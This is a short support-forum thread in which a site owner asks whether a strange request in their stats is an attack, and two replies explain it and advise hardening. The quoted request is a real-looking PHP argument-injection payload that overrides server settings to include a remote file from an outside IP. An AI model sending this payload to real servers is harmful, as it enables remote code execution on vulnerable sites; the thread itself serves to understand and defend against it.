Is this a hacker messing with my site?

  • Hello.

    So I was checking my site stats and I found a visitor who came to my site today was fishy.

    The destination “page” the visitor was trying to access is….

    -dsafe_mode%253dOff+-ddisable_functions%253dNULL+-dallow_url_fopen%253dOn+-dallow_url_include%253dOn+-dauto_prepend_file%253dhttp%253A%252F%252F75.99.7.131%252Fchanglog.txt

    Normally my stats pluging would show the page or post title here so this one kind of got my back up a bit.

    I banned the IP, but would still like to know if anyone understands what he was after and whether or not I should be worried about it.

    Thanks.

Viewing 2 replies - 1 through 2 (of 2 total)
  • Moderator bcworkz

    (@bcworkz)

    He’s trying to override your PHP settings so that he can upload a file, likely malicious code. This could only work on a very badly configured server, there’s nothing to worry about if you are using a reputable host.

    Probably the only servers this badly configured would be home installations of someone with no clue.

    As long as you use good strong passwords and are careful where you get themes and plugins from, there’s no need to worry about this sort of thing.

    Hi,

    If your server configurations are very good then you do not need to worry about this. If not, then i recommend you to scan the files for malicious code on your server and then harden the security of your site. He might gained access to your site. You blocked his IP address but he can use another IP address.

    Thanks,
    Maninder Singh Toor

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Is this a hacker messing with my site?’ is closed to new replies.